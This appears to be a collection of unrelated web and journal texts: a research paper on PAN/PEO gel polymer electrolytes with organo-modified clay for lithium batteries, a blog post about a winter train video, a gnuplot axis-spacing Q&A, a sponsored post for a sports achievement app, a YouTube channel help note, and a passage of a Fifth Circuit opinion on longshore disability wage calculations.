Despite the efforts, however, there is still the need to design a gel electrolyte able to guarantee adequate electrical performance without sacrificing mechanical strength and thermal resistance. In the present study, PAN/PEO blend (80:20 weight ratio) polymers were used in order to prepare nanocomposite GPEs with an organo-modified clay. Specifically, hydrated sodium calcium aluminum magnesium silicate hydroxide (SWy-2, Nanocor) was the natural montmorillonite/smectite clay selected since it is relatively inexpensive, widely available and has small particle size as well as it shows good intercalation capability. The organo-modification of the SWy-2 (org-SWy) was achieved by ion exchange reaction with hexadecyltrimethyl ammonium bromide (CTAB). The filler loading of org-SWy in the GPE was 10 wt % with respect to the polymers PAN/PEO. For the gel preparation, a mixture of ethylene carbonate (EC) and propylene carbonate (PC), with molar ratio EC:PC 1:0.4, was used as plasticizer, while lithium trifluoromethanesulfonate (LiTr) was the salt chosen.
In order to compare the effect of the clay on the gel properties, also not blended and filler-free GPE membranes were also prepared.
All the GPEs were investigated by thermal (DSC), morphological (scanning electronic microscopy-SEM) and mechanical (DMA) analysis, while the ion transport studies were conducted by electrochemical impedance spectroscopy (EIS) and by multinuclear NMR spectroscopy. In particular, the ^1^H, ^7^Li, and ^19^F pulse-field-gradient (PFG) method was employed to obtain a direct measurement of the self-diffusion coefficients both of ions and solvents plasticizers (EC/PC), while the spin-lattice relaxation time (T~1~) was obtained by the inversion recovery sequence.
The combination of the electrochemical and NMR data has provided a wide description of the ions dynamics inside the so complex systems, as well as information on ion associations and interactions between polymers, filler and ions.
2. Materials and Methods {#sec2-membranes-08-00069}
2.1. Materials {#sec2dot1-membranes-08-00069}
Poly(ethylene oxide) (PEO, M.W. 5,000,000), polyacrylonitrile (PAN), lithium trifluoromethanesulfonate (LiCF~3~SO~3~ or LiTr, 99.95%), ethylene carbonate (EC, 98%), propylene carbonate anhydrous (PC, 99.7%), and hexadecyltrimethyl ammonium bromide (CTAB, 98%) were purchased from Sigma Aldrich, Milan, Italy and used as received.
Natural smectite Wyoming montmorillonite (SWy-2) has obtained from the Source Clay Minerals Repository, University of Missouri Columbia, MO, USA. The cation exchange capacity (CEC), measured by the Co(II) procedure, is equal to 80 mequiv. per 100 g of clay, charge density 0.6 e^−1^/unit cell (the unit cell is the Si~8~O~20~ unit) and particle size around 200 nm. The structural formula is Na~0.62~\[Al~3.01~Fe(III)~0.41~Mg~0.54~Mn~0.01~Ti~0.02~\](Si~7.98~Al~0.02~) O~20~(OH)~4~.
2.2. Synthesys of Organo-Modified Clay (Org-Swy) {#sec2dot2-membranes-08-00069}
SWy-2 were first fractioned to \<2 μm by gravity sedimentation and purified by well-established procedures in clay science \[[@B29-membranes-08-00069]\]. For the chemical modification, the cation exchange capacity of smectite clay has been exploited. CTAB (0.4 g) was dissolved in boiling deionized water until complete dissolution, then the resulting solution has been dropwise added, under vigorous stirring, to a dispersion of SWy-2 (1.0 g) in deionized water at 60 °C and left for 6 h to achieve the total cationic exchange. Finally, the mixture solution was separated by centrifugation, rinsed repeatedly with deionized water until Br− was completely removed, and dried for 24 h at 90 °C.
2.3. GPE Membrane Preparation {#sec2dot3-membranes-08-00069}
The solvent casting technique has been used to prepare both blended and not blended membranes, by immobilization of a lithium salt solution in a polymer matrix.
The required amounts of PAN and PAN-PEO (80/20 blend ratio) were dissolved in anhydrous dimetylformammide (DMF). The solution was stirred for several hours at 60 °C, until a homogeneous mixture was obtained and, after complete dissolution, the electrolyte solution was added. For the electrolyte solution, LiCF~3~SO~3~ was dissolved in a mixture of EC and PC with a fixed molar ratio (1:0.4). The lithium content, expressed as the ratio between the number of EC-PC moles and the LiTr moles (also O/Li ratio), was 10/1. Finally, the polymers/plasticizers \[PAN:(EC-PC) and (PAN-PEO)/(EC-PC)\] weight ratio was of 26:74.
For the nanocomposite GPEs, the appropriate amount of organo-modified clay has been added to DMF, mechanically stirred for 16 h and sonicated for 8 h to obtain a homogeneous dispersion. The dispersion was then added dropwise to the polymer solution, followed by further sonication and stirring. Here composite membranes with 10% of filler loading with respect to the polymer were prepared. The membranes were achieved by casting the solution on the aluminum plate at 50 °C overnight to favor the evaporation of DMF.
2.4. Characterization Techniques {#sec2dot4-membranes-08-00069}
NMR measurements were performed with a BRUKER AVANCE 300 Wide Bore spectrometer working at 116.6 MHz on ^7^Li, and 282.4 MHz on ^19^F, respectively. The employed probe was a Diff30 Z-diffusion 30 G/cm/A multinuclear with substitutable RF inserts. Spectra were obtained by transforming the resulting free-induction decay (FID) of single π/2 pulse sequences.
The pulsed field gradient stimulated-echo (PFG-STE) method \[[@B30-membranes-08-00069]\] was used to measure the self-diffusion coefficients of lithium and triflate ions. The sequence consists of three 90° RF pulses (π/2 − τ~1~ − π/2 − τ~m~ − π/2) and two gradient pulses that are applied after the first and the third RF pulses, respectively. The echo is found at time τ = 2τ~1~ + τ~m~. Following the usual notation, the magnetic field pulses have magnitude g, duration δ, and time delay Δ. The FT echo decays were analyzed by means of the relevant Stejskal--Tanner expression: $$I = I_{0}e^{- \mathsf{\beta}D}$$
Here *I* and *I*~0~ represent the intensity/area of a selected resonance peak in the presence and in absence of gradients, respectively. β is the field gradient parameter, defined as β = \[(γgδ)\]^2^ (∆ − δ/3)\]; *D* is the measured self-diffusion coefficient.
In these experiments, the used experimental parameters were: δ = 3 ms, time delay Δ = 30 ms, and the gradient amplitude varied from 350 to 1000 G cm^−1^. Based on the very low standard deviation of the fitting curve and repeatability of the measurements, the uncertainties in *D* values are estimated to about 3%.
Finally, longitudinal relaxation times (T~1~) of ^7^Li and ^19^F were measured by the inversion-recovery sequence (π -- τ − π/2). All the NMR measurements were run by increasing temperature step by step from 20 to 80 °C, with steps of 10 °C, and leaving the sample to equilibrate for about 20 min at each temperature value.
From *D~Li~* and *D~F~* self-diffusion coefficients, σ*~NMR~* values were calculated according with the Nernst-Einstein equation: $$\mathsf{\sigma}_{NMR} = \frac{F^{2}c_{LiTr}}{RT}\left( {D_{Li^{+}} + D_{F^{+}}} \right)$$
Here, *F* is the Faraday constant, *R* is the molar gas constant, *T* is the temperature to which *D* has been measured and *c~LiTr~* is the salt concentration.
The ionic conductivity (σ, S cm^−1^) was measured by impedance spectroscopy recorded at OCV with an oscillating potential of 10 mV in the frequency range 0.1--1 × 10^6^ Hz using a PGSTAT 30 (MetrohmAutolab) potentiostat/galvanostat/FRA. GPEs were sandwiched between two disks of conductive carbon cloth, placed between two stainless steel electrodes and assembled in a homemade two-electrode cell. The impedance responses of the cell were analyzed using MetrohmAutolab NOVA software and the bulk resistance (*R~b~*) was extracted from the intercept of the low frequency signal in the Nyquist plot. The equation for calculating the conductivity is:$$\mathsf{\sigma} = \frac{l}{R_{b} \ast A}$$ where *l* is the thickness of the membrane and *A* is the area of the carbon cloth electrode.
Dynamic mechanical analysis (DMA) measurements were carried out on a Metravib DMA/25 analyzer equipped with a shear jaw for film clamping. Frequency sweep experiments were collected by subjecting a rectangular film to a dynamic strain of amplitude 10^-4^ in the range between 0.2 and 20 Hz. For temperature sweep (time cure) experiments a dynamic strain of amplitude 10^−4^ at 1 Hz was applied from 25 to 160 °C with a heating rate of 2 °C/min. A periodic sinusoidal displacement was applied to the sample, and the resultant force was measured. The damping factor, tan *d*, is defined as the ratio of loss (E′′) to storage (E′) modulus.
The thermal behaviors were investigated by Setaram 131 DSC. Samples were hermetically sealed and cooled from room temperature to −40 °C using liquid N~2~. Measurements were carried out from −30 °C up to 120 °C at the scan rate of 10 °C/min and purging nitrogen gas.
Finally, the membrane's morphology was investigated by scanning electron microscopy (SEM, Cambridge Stereoscan 360, Santa Clara, CA, USA). To observe the membrane cross-sections, the samples were first frozen and fractured in liquid nitrogen, to guarantee a sharp fracture without modifications of the morphology, and then observed with SEM. The samples were sputter-coated with a thin gold film prior to SEM observation.
3. Results and Discussion {#sec3-membranes-08-00069}
3.1. Morphological, Thermal, and Mechanical Characterizzation of the GPEs {#sec3dot1-membranes-08-00069}
The organo-modification of the clay's layers has as the main objective of favoring a good and homogeneous dispersion of the nanoparticles into the hosting matrix. For this purpose, hexadecyltrimethyl ammonium bromide was used as organophilic reagents: the quaternary ammonium group should allow an easy intercalation into the hydrophilic clay layers while the long alkyl chain should enhance the affinity between particles and polymer chains \[[@B31-membranes-08-00069]\]. The photos of the four gel electrolytes prepared in this study are reported in [Figure 1](#membranes-08-00069-f001){ref-type="fig"}. They all appear opalescent, while the introduction of the org-SWy causes a slight yellowing of the resulting GPEs ([Figure 1](#membranes-08-00069-f001){ref-type="fig"}b,d). However, they are very dense and homogeneous, and there is no evidence of phase segregation between PAN and PEO polymers into the blended gels, indicating that the proposed method allows to obtain a homogenous and stable mixtures of polymers. Further, no clay particles crystals were observed, confirming that the chemical modification of the layers' surface improves the clay/polymer interaction and, thus, highly homogeneous composite membranes, without formation of agglomerates or clusters, can be prepared.
Scanning electron microscopy (SEM) coupled with BSE (backscattered electrons) was used to deeper investigate the morphology of the composite membranes. The BSE technique is generally used to detect contrast between areas with different chemical compositions (elements with high atomic number backscatter electrons more efficiently than light elements, appearing brighter in the image). By comparing the SEM-BSE images obtained on pristine PAN and PAN/org-SWy electrolytes, shown in [Figure 2](#membranes-08-00069-f002){ref-type="fig"}a,b, respectively, it clearly emerges that the presence of the filler particles severely affect the film morphology. The porous structure of the PAN based gel disappear in the composite gel, becoming a very dense membrane. Sporadic particle aggregations are also detectable, as expected if we take into account the large percentage of filler added into the polymer matrix (10 wt %). However, the average particles size of such aggregates is circa 500 nm, therefore, it can be stated that the nano-sized and homogeneous dispersion of clay layers was achieved in these composite GPEs. Concerning the blends ([Figure 2](#membranes-08-00069-f002){ref-type="fig"}c,d), SEM + BSE images give clear evidence that no phase separation occurs between the two polymers, as well as the presence of PEO allows the reduction of the number of nanosized aggregates in the composite blend electrolyte by virtue of a greater affinity between poly(ethylene oxide) chains and the org-SWy lamellae.
The analysis of the thermal properties of the prepared electrolytes has been carried out by DSC, and the thermograms collected in the temperature range between −30 and 120 °C are showed in [Figure 3](#membranes-08-00069-f003){ref-type="fig"}. For clarity it must be noticed that, in order to highlight the peaks, an enlarged scale was used.
The PAN-based gel shows two endothermic peak, the first one narrow, at about 71 °C (T~gI~), and the second broad peak at circa 100 °C (T~gII~). It was already demonstrated \[[@B32-membranes-08-00069]\] that unoriented PAN has a "two-phase" morphology consisting of laterally-ordered and amorphous domains, both in a glassy state at room temperature, thus leading to two glass transition at 100 and 150 °C, respectively. In our films, the inclusion of EC/PC plasticizer lowers both T~g~ respect to pristine PAN, as a consequence of the reduction of the crystallites size \[[@B33-membranes-08-00069]\]. The dispersion of org-SWy platelets leads to a large shift of the transitions of both laterally-ordered and amorphous domains (red line in the [Figure 3](#membranes-08-00069-f003){ref-type="fig"}), and also to a reduction of the peaks intensities, suggesting interactions between the organo-modified silicate layers and the polymer chains. It can be hypothesized that org-SWy particles increase the distance between polymer chains and, hence, diminish their capability to re-aggregate in glassy domains.
Focusing on blended electrolytes, in PAN:PEO films a small peak at 44 °C appears, corresponding to the typical temperature at which PEO crystalline domains becomes rubbery amorphous phase (T~m~ PEO). Finally, the nanocomposite blend electrolyte shows a single broad peak at 45 °C ascribed to the T~gI~ of PAN while disappear the T~m~ of PEO. The result can be explained in terms of larger chemical affinity between clay platelets and PEO chains, which reduces PEO re-crystallization and, at the same time, favors the dispersion of filler's particles within the polymer matrix.
Concerning the mechanical properties of the GPEs systems, the measurements were performed by dynamic mechanical analysis, by using a shear jaw for films sample holder. It is worth pointing out that, generally, oscillatory rheological tests on typical GPEs are carried out by using a plate-plate geometry, while, in this case, due to the solid-like nature of our gels, a typical DMA configuration for thin films was used.
[Figure 4](#membranes-08-00069-f004){ref-type="fig"}a shows the storage modulus (E′) in the frequency range of 0.2--20 Hz measured at 25 °C: Except for one sample which will be discussed later, E′ shows values above 10^7^ Pa, significantly higher than other gels reported in the literature \[[@B34-membranes-08-00069],[@B35-membranes-08-00069],[@B36-membranes-08-00069]\], and it reaches 10^8^ Pa upon inclusion of org-SWy lamellae in the PAN matrix, indicating an increase in the rigidity of the system. Blending PAN and PEO polymers also results in an enhanced storage modulus as a consequence of the increased overall crystallinity of the polymeric matrix. However, completely unexpected is the net reduction of the storage modulus of the composite blend PAN:PEO/org-SWy electrolyte to 10^6^ Pa. This evidence can be explained by taking into account the DSC data seen above. The inclusion of the clay into the polymer matrices prevents the reorganization of PAN and PEO chains into crystalline stacks, affecting the mechanical strength of the film but, at the same time, improves the flexibility of polymer chains, with important implications on the transport properties of this electrolyte gel. However, the temperature-sweep test shown in [Figure 4](#membranes-08-00069-f004){ref-type="fig"}b demonstrates that this composite still maintains the typical strong-gel behavior, likely due to the interactions between clay platelets and polymer chains. In fact, at least up to 160 °C, the storage modulus E' exceeds significantly the loss modulus E′′, indicating that the gel responds elastically at small deformations and its microstructure is unchanged over this temperature range. The slight slope of the moduli is indicative of an evolution towards a "weak-gel" configuration, nonetheless, no crossover between the moduli occurs; therefore, the structure of the gel is preserved.
3.2. Transport Properties of Ions {#sec3dot2-membranes-08-00069}
The ionic conductivities of the prepared gel polymer electrolytes were investigated by EIS analysis. The impedance Nyquist plots of two representative GPEs are reported in [Figure 5](#membranes-08-00069-f005){ref-type="fig"}. The insets in each graph show an enlargement of the low resistance region, where the semicircle is achieved. In fact, the spectra show two well-defined regions: a semicircular region at high frequency range (attributed to ion conduction process in the bulk of the gel polymer electrolyte) followed by a straight line inclined at constant angle of circa 40° to the real axis at low frequency range related to the effect of blocking electrodes \[[@B37-membranes-08-00069],[@B38-membranes-08-00069]\]. By comparing the spectra of PAN gels ([Figure 5](#membranes-08-00069-f005){ref-type="fig"}a) and of PAN/org-SWy nanocomposite ([Figure 5](#membranes-08-00069-f005){ref-type="fig"}b), we can notice that the semicircle of the nanocomposite appears as depressed, i.e., it is not completed in the frequency range used, although very high (1 MHz). This indicates that multiple processes and/or mechanisms of conduction simultaneously coexist \[[@B27-membranes-08-00069]\]. A similar trend has been also observed in blended PAN:PEO/org-SWy electrolyte, even if less pronounced.
From the fitting of the semicircle in the high-frequency region, the electrolyte resistance was estimated and the ionic conductivity (σ) calculated according to the formula reported in the experimental and displayed in [Figure 6](#membranes-08-00069-f006){ref-type="fig"}. It clearly emerges that PAN-SWy nanocomposite gel is the less conductive electrolyte. Such an outcome can be explained by considering the changing of the gel morphology upon addition of the clay to the polymer matrix, as discussed above, which becomes dense, as well as more rigid (higher Young's modulus). Therefore, the polymer chains experience lower flexibility, as well as a large reduction of liquid electrolyte mobility is expected by the decrease of the membrane porosity, both contributing to the reduction of the ion conduction.
Similar discussion can be made on the PAN:PEO blend gel, where the enhanced membrane rigidity caused by the increased number of crystalline domains of PEO significantly affects σ compared to the unblended PAN.
The best result was achieved by the addition of 10 wt % of organo-modified SWy in the PAN:PEO blend, which displays the highest ion conductivity over the whole temperature range, with a σ of almost 2.8 mS/cm at r.t. Comparing to similar GPEs reported in the literature, these conductivities are surely remarkable: e.g., they are two orders of magnitude higher than hybrid electrolytes composed of PEO and glass-ceramic particles (2.81 × 10^−2^ mS/cm) \[[@B26-membranes-08-00069]\] and three orders higher than PEO containing conductive microsized particles (1 × 10^−3^ mS/cm) \[[@B39-membranes-08-00069]\], while they are close to those reported by He et al. \[[@B31-membranes-08-00069]\] for a PAN/organic montmorillonite system (2.23 mS/cm), even if, here, an electrolyte uptake of ca. 300% was needed, resulting in deterioration of the membrane stability. Accordingly, it can be stated that the PAN:PEO composite gels are able to guarantee good polymer chain flexibility together with outstanding mechanical and thermal resistance, making these systems particularly attractive as solid electrolytes for lithium batteries.
It is well known that the ionic conductivity obtained by EIS only refers to the mobility of charged species, with no possibility to distinguish between the cation and the anion. Conversely, NMR methods allow to discriminate and selectively investigate the mobility of Li^+^ and the corresponding counterion, confirming the effectiveness regarding the investigation of ions dynamics inside the complex systems, as well as information on ion associations and interactions between polymers, filler, and ions. Accordingly, NMR was used here to investigate the transport properties of both lithium cations and triflate anions, by detecting the ^7^Li and ^19^F spin-nuclei, respectively.
[Figure 7](#membranes-08-00069-f007){ref-type="fig"} displays the lithium self-diffusion coefficients (*D~Li~*) measured on the GPEs' membranes, both unblended (left) and blended (right), respectively. In agreement with the conductivity seen above, the addition of org-SWy to PAN reduces the lithium mobility while it has beneficial impact in the PAN:PEO blend. However, very interesting is the bi-exponential decay of the echo-signal obtained in both composite systems, observed also for the *D~F~* (diffusion values for ^19^F, not reported in the graph). This result indicates that two different mechanism for the diffusing species coexist as a consequence of the presence of the clay lamellae. The aluminosilicate platelets possess a fixed negative charge and the quaternary ammonium group of CTAB molecules was chosen as intercalating cation. Ions are solvated both from the clay layers ("lamellae-solvation") and from the EC/PC solvents ("bulk-solvation") and, of course, the polymers play their role in such coordination.
Ions involved in the "bulk-solvation" show higher mobility (*D*~1~) respect to that one involved in the "lamellae-solvation" (*D*~2~).
Such a hypothesis was confirmed by the spin-lattice relaxation time (T~1~), which, compared to diffusion, reflects more localized motions, including both translation and rotation on a time scale comparable to the reciprocal of the NMR angular frequency (few nanoseconds). T~1~ quantifies the energy transfer rate from the nuclear spin system to the neighboring molecules (the lattice). The stronger the interaction, the quicker the relaxation (shorter T~1~). [Figure 8](#membranes-08-00069-f008){ref-type="fig"} reports the Arrhenius plots of T~1~ measured on the different GPEs for ^7^Li and ^19^F, respectively. It is clear that the introduction of org-SWy particles produces a decrease of T~1~, both for ^7^Li and ^19^F. This outcome can be ascribed to the stronger overall interactions of the ions with the lattice, i.e., lithium ions interact with negative charged surface of the platelets, while counterions solvate the quaternary ammonium groups of the organo-surfactant. In other words, ions experience a lower degree of freedom resulting in shorter T~1~ values.
According to the Nernst-Einstein equation, conductivity values (σ*~NMR~*) were calculated from *D~Li~* and *D~F~* for the different GPEs and compared with the experimental ion conductivity (σ*~EIS~*) in [Table 1](#membranes-08-00069-t001){ref-type="table"} (for two representative gels). We need to consider that differently from σ*~EIS~*, σ*~NMR~* is affected not from the mobility of all species containing ^7^Li and ^19^F, including neutral ion pairs, and not only from the charged species. Therefore, it is not unusual for the NMR conductivity to be greater than the experimental σ, in particular when ion associations occurs. By considering the bi-exponentiality of both Li^+^ and F^−^ diffusion, and based on the hypothesis discussed above, we managed to calculate an average of *D*~1~ and *D*~2~ weighed with respect to the amount of filler added, i.e., 10 wt %. It is evident from the data reported that NMR conductivity values are always much higher than experimental ones suggesting the presence of a large number of ion pairing. This is also confirmed by the ionicity indices reported in [Table 1](#membranes-08-00069-t001){ref-type="table"} and computed as the ratio σ*~EIS~*/σ*~NMR~*.
PAN gel, our reference's system, shows an ionicity close to 0.45. This suggests that 55% of Li^+^ and Tr^−^ exist as neutral ion pairs, which is typical for GPEs. The addition of filler particles into the blend increases the level of salt dissociation, likely due to the high dielectric constants of the charged organo-modified smectite clays that should also help to prevent the ionic association. Both phenomena leads to an ionicity index of 0.68 at r.t., which is a particularly high value for a double-ion solid-state electrolyte. Ionic association increases by increasing the temperature \[[@B11-membranes-08-00069],[@B39-membranes-08-00069]\], therefore, the ionicity index decreases.
Finally, an important parameter for allowing a proper operation of the polymer electrolyte in real device is the lithium transport number ($t_{Li^{+}}$). It was calculated in this work according to the following equation and reported in [Table 1](#membranes-08-00069-t001){ref-type="table"}: $$t_{Li^{+}} = \frac{D_{Li^{+}}}{D_{Li^{+}} + D_{F^{-}}}$$
The PAN:PEO/org-SWy electrolyte shows a value of 0.68 at r.t., much higher than the PAN-gel and also the typical GPEs, for which values lower than 0.30 are generally reported \[[@B26-membranes-08-00069],[@B40-membranes-08-00069],[@B41-membranes-08-00069],[@B42-membranes-08-00069],[@B43-membranes-08-00069]\]. GPEs with higher lithium transport number, i.e., ca. 0.55, has also been reported, but the ion conductivities are quite low \[[@B44-membranes-08-00069]\]. The reasons of the improved $t_{Li^{+}}$ in our blend composite membrane can be multiple and synergistic: (i) the organo-clay particles have a plasticizing effect, lowering the cristallinity and, thus, improving the flexibility of polymer chains, favoring the Li^+^ transport through polymer segmental motions; and (ii) electrostatic interactions between the filler surface and lithium can create a preferential pathways for lithium conduction.
4. Conclusions {#sec4-membranes-08-00069}
Organo-modified smectite clay particles were prepared and dispersed into PAN and PAN:PEO blend polymers in order to prepare hybrid gel polymer electrolytes. Morphological studies proved that the procedure herein proposed allows to avoid phase separation between PAN and PEO as well as guarantee high nano-dispersion of the clay particles in the polymer matrix. The presence of the clay platelets strongly affected morphology, thermal and mechanical stability and electrochemical properties of the GPEs. In particular, outstanding behavior was displayed by the PAN:PEO/org-SWy membrane. ^7^Li and ^19^F NMR spectroscopy was successfully applied to get a complete description of the ions dynamics in so complex systems, probing as the smectite clay surfaces are able to "solvate" both lithium and triflate ions, preventing the ion pairing (as also confirmed by the high ionicity index) and creating preferential pathways for lithium conduction.
The authors would like to thank Mariano Davoli, University of Calabria, for his precious support in the morphological characterization of the membranes.
Conceptualization, I.N. and C.S.; Methodology, C.S., E.L. and L.C.; Validation, I.N.; Investigation, C.S. and E.L.; Resources, I.N.; Data Curation, C.S. and L.C.; Writing-Original Draft Preparation, C.S.; Writing-Review & Editing, I.N.; Supervision, I.N.; Project Administration, I.N.; Funding Acquisition, I.N.
This work was supported by the European Community's Seventh Framework Program (FP7 2007-2013) through the MATERIA Project (PONa3_00370).
The authors declare no conflict of interest.
membranes-08-00069-t001_Table 1
Comparison between σ*~EIS~* and σ*~NMR~*(in Ms cm^−1^), ionicity index and lithium transport number for PAN and PAN:PEO/org-SWy electrolytes.
T (°C) PAN PAN-PEO + 10% SW
-------- ------ ------------------ ------ ------ ------ ------- ------ ------
20 1.77 3.92 0.45 0.40 2.79 4.31 0.68 0.68
30 2.08 5.02 0.41 0.41 3.22 4.74 0.65 0.67
40 2.31 6.96 0.33 0.41 3.37 7.84 0.53 0.59
50 2.56 8.19 0.31 0.43 3.17 9.07 0.45 0.56
60 2.74 9.68 0.28 0.44 3.77 9.82 0.48 0.56
70 3.03 11.1 0.27 0.43 4.05 11.20 0.42 0.57
80 3.12 11.8 0.27 0.45 4.24 12.33 0.38 0.58
| {
"pile_set_name": "PubMed Central"
} |
I spent a reasonable time on trains lately and most of the time had my camera with me. Of course I could have slept or read or whatever but most often I was staring out the window fascinated by the winter scenery that was passing by. I don‘t know if I should say „unfortunately“ but in Bolzano we mostly have sun and blue skies. The ski resorts are suffering a bit but I quite like the sun. It somehow makes you happy once you cross the Brennero and suddenly the weather changes from grey and snowy austrian weather to sunny „italian“ weather. But anyway I made this short video coming back from Munich two days ago. It’s basically three short clips in overlay mapped to the music – a song by Lali Puna called „Scary World Theory“. It’s a first try again (I keep forgetting things if I‘m not constantly doing videos and editing them) and at some points it definitely would need some fine-tuning. Other than that I‘m quite happy with the result. I hope you like it, too.
1 Antwort auf “trains in winter time”
Nice train video. Nice website too. I happened to hit your site via your Iceland shots, a couple of which I would like to use for my presentation about the early earth. No commercial use, only for a group of amateur astronomers here in the Netherlands. Would you mind? Thx in advance. Kind regards, Rob | {
"pile_set_name": "Pile-CC"
} |
adding space between x axis and xtics in gnuplot histogram
Currently I created graphs with small size. The spacing really important at this case. I want to add more vertical space between my xticlabels and x axis.
I have tried to set the x bar with
set xtics offset 0,graph 0.05
my gnuplot output:
The data and gnuplot script still same with my previous question here.
You can do the following:
First add a little bit of bmargin by
set bmargin 3
Since you need to add vertical space between your xticlabels and x-axis, you need to adjust the Y-offset, which can be done by the following
set xtics offset 0,-1,0
You can play around with the values to suite your need.
| {
"pile_set_name": "StackExchange"
} |
Using Personal Best Pro on the App Store for my Sports Child #app #spon #free #apple
Today I am sharing Personal Best Pro app for the sports families, whether it’s you or the children who play sports this is a great app to keep track of the achievements, events or other goals met in sports. Easily add users in the home screen to create a family account. Each user may have an image assigned, name and date of birth. After each user is put into Personal Best Pro iOS app then you can start to add sports and achievements for each sport.
An easy way to remember various achievements your children or yourself have made and maybe even celebrate! I am a Mom who may be found doing a happy dance for each achievement my children make; currently my two boys are in wrestling and it’s their first year. This is my season to start happy dancing around because they did a bridge stretch higher than they did on the last practice or they started to use a wrestling move more efficiently than they did in their first week of wrestling. Whatever achievement my sons make, it’s great to have Personal Best Pro app installed so I have notes right there, this is also a great app to assist me to reviewing my son’s achievements at wrestling to tell their Dad. My son’s Dad and I are divorced, we co-parent together so this means I have to try to jot down weekly achievements to let their Dad know with a report during the week or in their folder we exchange for news and notices.
I just love this app because really the Personal Best Pro will assist me in being better at logging activities my son’s complete in their sports through out the year. During next school year when my daughter cheers and middle child is in soccer, I can also monitor their achievements and it will be fabulous to have an app in hand to do that with.
I say you take a second to go check out Personal Best Pro in the app store if you have sports running in your family – again this can be for the adults or children; it really is a useful tool to keep track of achievements that will 1) allow you to push harder next time and 2) celebrate goals reached in sports.
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Interacting on a YouTube Live Session
Modified on: 2018-06-18 10:17:48 +0200
This step-by-step guide will assist you in setting up a YouTube Channel. This is a requirement if you wish to interact in a YouTube live session.
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If you do not have a YouTube channel you will be prompted to create one when you click on the live session link. In order to do this please follow the steps below:
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"pile_set_name": "Pile-CC"
} |
137 F.3d 326
AVONDALE INDUSTRIES, INC., Petitioner,v.Rodney PULLIAM; Director, Office of Worker's CompensationPrograms, U.S. Department of Labor, Respondents.
No. 97-60569
Summary Calendar.
United States Court of Appeals,Fifth Circuit.
March 31, 1998.
Joseph J. Lowenthal, Jr., R. Scott Jenkins, Jones, Walker, Waechter, Poitevent, Carrere & Denegre, New Orleans, LA, for Petitioner.
Joseph Paul Demarest, Favret, Demarest, Russo & Lutkewitte, New Orleans, LA, for Pulliam.
Thomas O. Shepherd, Jr., Clerk, Benefits Review Bd., Washington, DC, Carol DeDeo, Assoc. Sol., U.S. Dept. of Labor, Dir., Office of Workers Comp. Programs, Washington, DC, for Director, Office of Worker's Compensation Programs, U.S. Dept. of Labor.
Petition for Review of an Order of the Benefits Review Board.
Before DUHE, DeMOSS and DENNIS, Circuit Judges.
DUHE, Circuit Judge:
Appellee injured his shoulder and sued Appellant, his former employer, for permanent and total disability payments under the Longshore and Harbor Workers' Compensation Act. The administrative law judge awarded him permanent, partial disability payments and calculated his wage earning capacity by averaging the hourly wage of five jobs which Appellant had found for Appellee. The Benefits Review Board affirmed. The res nova issue presented is the proper method of computing post-injury wage earning capacity when the employer locates more than one suitable job for the claimant. We affirm the ALJ's use of averaging.
* In May 1992, Rodney Pulliam ("Pulliam"), a sheet metal mechanic for Avondale Shipyards ("Avondale"), fell off a scaffold and injured his shoulder. Pulliam continued to work for Avondale until July when he quit.
In February 1994, Pulliam underwent surgery on his shoulder but was not able to return to work until January 1995. In the meantime, Avondale hired a certified rehabilitation counselor to analyze Pulliam's ability to be re-employed. The counselor conducted a labor market survey to identify jobs within Pulliam's mental and physical capabilities as well as his geographic area. The counselor found forty-four such jobs, none of which Pulliam secured.
Pulliam sued Avondale for permanent, total disability compensation under the Longshore and Harbor Workers' Compensation Act ("LWHCA"). In attempting to establish total disability, Pulliam argued to the administrative law judge ("ALJ") that he had diligently tried to obtain other employment, but that no one would hire him. He pointed to the fact that he contacted all but five1 of the prospective employers. The ALJ disagreed, finding that Pulliam had not been diligent in his job search. Rather, the ALJ found that Pulliam had, in at least two instances, misrepresented the status of his injury so as to hurt his chances of being hired. Thus, Pulliam was entitled only to permanent, partial disability.2
In calculating Pulliam's post-injury wage earning capacity, the ALJ averaged the hourly wage of the five jobs for which Pulliam did not apply. Avondale unsuccessfully appealed to the Benefits Review Board ("BRB") arguing alternatively that the ALJ should have based Pulliam's compensation using the highest wage of the five jobs and that the ALJ should have considered all forty-four jobs in his calculation. The BRB affirmed the ALJ's findings and adjusted the ALJ's calculation of the average.3 Avondale now appeals.
When the BRB affirms an ALJ's decision, we may reverse the ALJ's decision only if it is not supported by substantial evidence and is not in accordance with the law. New Thoughts Finishing Co. v. Chilton, 118 F.3d 1028, 1030-31 (5th Cir.1997). Substantial evidence is evidence that "a reasonable mind might accept as adequate to support a conclusion." Pierce v. Underwood, 487 U.S. 552, 564-65, 108 S.Ct. 2541, 2549-50, 101 L.Ed.2d 490 (1988) (internal quotation marks omitted).
* While 33 U.S.C. § 908(c)(21) sets forth the formula for calculating an employee's lost wage earning capacity, it gives no guidance for determining what the post-injury earning capacity is. Thus, the courts have determined post-injury earning capacity on a case by case basis. See Licor v. Washington Metropolitan Area Transit Authority, 879 F.2d 901 (D.C.Cir.1989); Pilkington v. Sun Shipbuilding and Dry Dock, 9 B.R.B.S. 473.
Avondale argues that the BRB should have vacated and remanded the ALJ's decision because the ALJ used the average of the wages rather than the highest wage. In P & M Crane v. Hayes, 930 F.2d 424 (5th Cir.1991), this Court held that an employer could satisfy its burden of proving alternate employment by showing that there was one job available in the local community. Here, Avondale points out that it more than satisfied its burden by showing that there were forty-four jobs available. Moreover, Avondale could have avoided this litigation altogether by finding the highest paying alternate employment for Pulliam. Instead, it provided Pulliam with a choice of forty-four jobs.
Avondale also urges this Court to reverse the ALJ's judgment based on policy. It contends that were we to affirm the ALJ, we would be discouraging other employers from attempting to find a range of suitable, alternate employment. To get around the averaging scheme, an employer would have to find only one, high paying job. Thus, should we reverse the ALJ, we would be encouraging employers to find a range of alternate employment. We disagree.
First, we find the policy argument unpersuasive. The employer, to avoid paying permanent, total disability benefits, has to show that there is suitable, alternate employment. We think it unlikely that an employer would risk having to pay permanent, total disability benefits by showing only one job available. Rather, the presumption that the employee is permanently and totally disabled would seem to encourage the employer to find as many alternate jobs as possible.
Second, in Shell Offshore, Inc. v. Cafiero, 122 F.3d 312, 318 (5th Cir.1997), we held that averaging was a reasonable method for determining an employee's post-injury wage earning capacity. We now explain why. We have held that an employer need not show that a specific job opening is available when proving suitable, alternate employment. See, Avondale Shipyards, Inc. v. Guidry, 967 F.2d 1039 (5th Cir.1992) (holding that an employer has to show only general availability). Thus, the courts have no way of determining which job, of the ones proven available, the employee will obtain. Averaging ensures that the post-injury wage earning capacity reflects all jobs available.
